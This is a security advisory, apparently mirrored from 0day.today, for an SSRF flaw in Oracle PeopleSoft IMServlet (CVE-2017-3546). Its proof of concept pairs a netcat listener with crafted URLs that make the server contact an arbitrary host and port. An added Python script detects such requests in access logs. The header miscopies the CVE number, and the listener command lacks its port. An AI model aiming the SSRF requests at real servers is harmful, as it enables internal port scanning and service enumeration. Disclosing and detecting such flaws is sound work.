Oracle PeopleSoft ToolsRelease / ToolsReleaseDB / HCM SSRF Vulnerabilities

Published: 20 Apr 2017 00:00:00 | Reported by: Roman Shalymov | Type: zdt | Source: 0day.today

Oracle PeopleSoft ToolsRelease / ToolsReleaseDB / HCM SSRF Vulnerabilities, High Risk, CVE-2017-354

Related

Reporter | Title | Published | Family
0day.today | Oracle PeopleSoft - Server-Side Request Forgery Vulnerability | 20 May 2017 00:00 | zdt
CNVD | Oracle PeopleSoft Enterprise PeopleTools Unauthorized Operation Vulnerability | 27 Apr 2017 00:00 | cnvd
CVE | CVE-2017-3546 | 24 Apr 2017 19:00 | cve
Cvelist | CVE-2017-3546 | 24 Apr 2017 19:00 | cvelist
Exploit DB | Oracle PeopleSoft - Server-Side Request Forgery | 19 May 2017 00:00 | exploitdb
erpscan | SSRF in PeopleSoft IMServlet | 23 Dec 2016 00:00 | erpscan
EUVD | EUVD-2017-12666 | 7 Oct 2025 00:30 | euvd
exploitpack | Oracle PeopleSoft - Server-Side Request Forgery | 19 May 2017 00:00 | exploitpack
NVD | CVE-2017-3546 | 24 Apr 2017 19:59 | nvd
Oracle | Oracle Critical Patch Update Advisory - April 2017 | 18 Apr 2017 00:00 | oracle

Application: Oracle PeopleSoft
Versions Affected: ToolsRelease: 8.55.03; ToolsReleaseDB: 8.55;
PeopleSoft HCM 9.2
Vendor URL: http://oracle.com
Bugs: SSRF
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Author: Roman Shalymov (ERPScan)

Description

1. ADVISORY INFORMATION

Title: [ERPSCAN-17-022] SSRF in PeopleSoft IMServlet
Advisory ID: [ERPSCAN-17-022]
Risk: high
CVE: CVE-2017-3546
Advisory URL: https://erpscan.com/advisories/erpscan-17-022-ssrf-peoplesoft-imservlet/
Date published: 18.04.2017
Vendors contacted: Oracle


2. VULNERABILITY INFORMATION

Class: SSRF
Impact: cross-site port attack, service enumeration
Remotely Exploitable: yes
Locally Exploitable: yes

CVSS Information

CVSS Base Score v3:    8.0 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) High (H)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Changed (C)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High (H)
A : Impact to Availability High (H)


3. VULNERABILITY DESCRIPTION

An attacker can force a vulnerable server to trigger malicious
requests to third-party servers or to internal resources. This
vulnerability can then be leveraged to launch specific attacks such as
a cross-site port attack, service enumeration, and various other
attacks.

4. VULNERABLE PACKAGES

ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2

5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, apply Oracle CPU April 2017.

6. AUTHOR

Roman Shalymov

7. TECHNICAL DESCRIPTION

PoC

Run netcat

1. nc -l -p # on some host

In browser open the following links

http://PPLSOFTSRV:8000/IMServlet?Method=CONNECT

http://PPLSOFTSRV:8000/IMServlet?Method=GOOGLE_PRESENCE&im_to_user=abc&im_server_name=GOOGLE&im_server=SOMEHOST:OPEN_PORT/?param=var%23


Read response in netcat

GET /?param=var HTTP/1.1
User-Agent: Java1.7.0_95
Host: SOMEHOST:OPEN_PORT
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: Keep-Alive
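
A defender's check for the request pattern shown in the PoC, as an added example that is not part of the ERPScan advisory: it scans web-server access logs for IMServlet requests whose im_server value carries URL syntax or names a host outside an allowlist. The common-log-format layout, the allowlist entry and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the only IM endpoint this deployment should contact (hypothetical).
ALLOWED_IM_SERVERS = {"im.corp.example:5222"}

# Client address and request target from a common-log-format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def check_line(line):
    """Return (client, reason) for a suspicious IMServlet request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/imservlet"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("im_server", []):
        # parse_qs has already percent-decoded, so %23 appears here as '#'.
        if re.search(r"[/?#@\\\s]", value):
            return client, f"im_server carries URL syntax: {value!r}"
        if value.lower() not in ALLOWED_IM_SERVERS:
            return client, f"im_server not in allowlist: {value!r}"
    return None

def scan(lines):
    """Collect a finding for every suspicious line."""
    return [hit for hit in map(check_line, lines) if hit]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Apr/2017:10:00:00 +0000] "GET /IMServlet?Method=CONNECT HTTP/1.1" 200 12',
    '192.0.2.10 - - [20/Apr/2017:10:00:05 +0000] "GET /IMServlet?Method=GOOGLE_PRESENCE&im_to_user=abc&im_server_name=GOOGLE&im_server=198.51.100.7:8080/?param=var%23 HTTP/1.1" 200 40',
    '192.0.2.22 - - [20/Apr/2017:10:01:00 +0000] "GET /IMServlet?Method=GOOGLE_PRESENCE&im_to_user=bob&im_server_name=GOOGLE&im_server=im.corp.example:5222 HTTP/1.1" 200 40',
    '192.0.2.10 - - [20/Apr/2017:10:02:00 +0000] "GET /IMServlet?Method=GOOGLE_PRESENCE&im_to_user=abc&im_server_name=GOOGLE&im_server=10.0.0.5:22 HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for client, reason in scan(SAMPLE_LOG):
        print(client, reason)
```

Outbound connections from the PeopleSoft host with a Java User-Agent to destinations outside the allowlist are the matching signal on the egress side.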

#  0day.today [2018-04-06]  #
